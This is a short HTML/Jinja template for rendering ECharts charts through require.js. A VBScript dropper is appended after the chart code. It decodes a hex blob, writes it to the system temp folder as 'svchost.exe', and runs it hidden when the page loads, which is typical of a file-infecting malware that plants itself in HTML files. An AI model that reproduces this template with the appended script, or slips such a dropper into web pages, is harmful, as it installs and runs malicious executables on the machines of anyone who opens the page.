<script>
    require.config({
        paths: {
            {{ config_items | join(', ') }}
        }
    });
</script>
{% for chart in charts %}
    {{ echarts_container(chart) }}
{% endfor %}


<script>
    require([{{ libraries | join(', ') }}], function(echarts) {
        {{ echarts_js_content_wrap(*charts) }}
    });
</script>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "[encoded data, 112640 characters]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>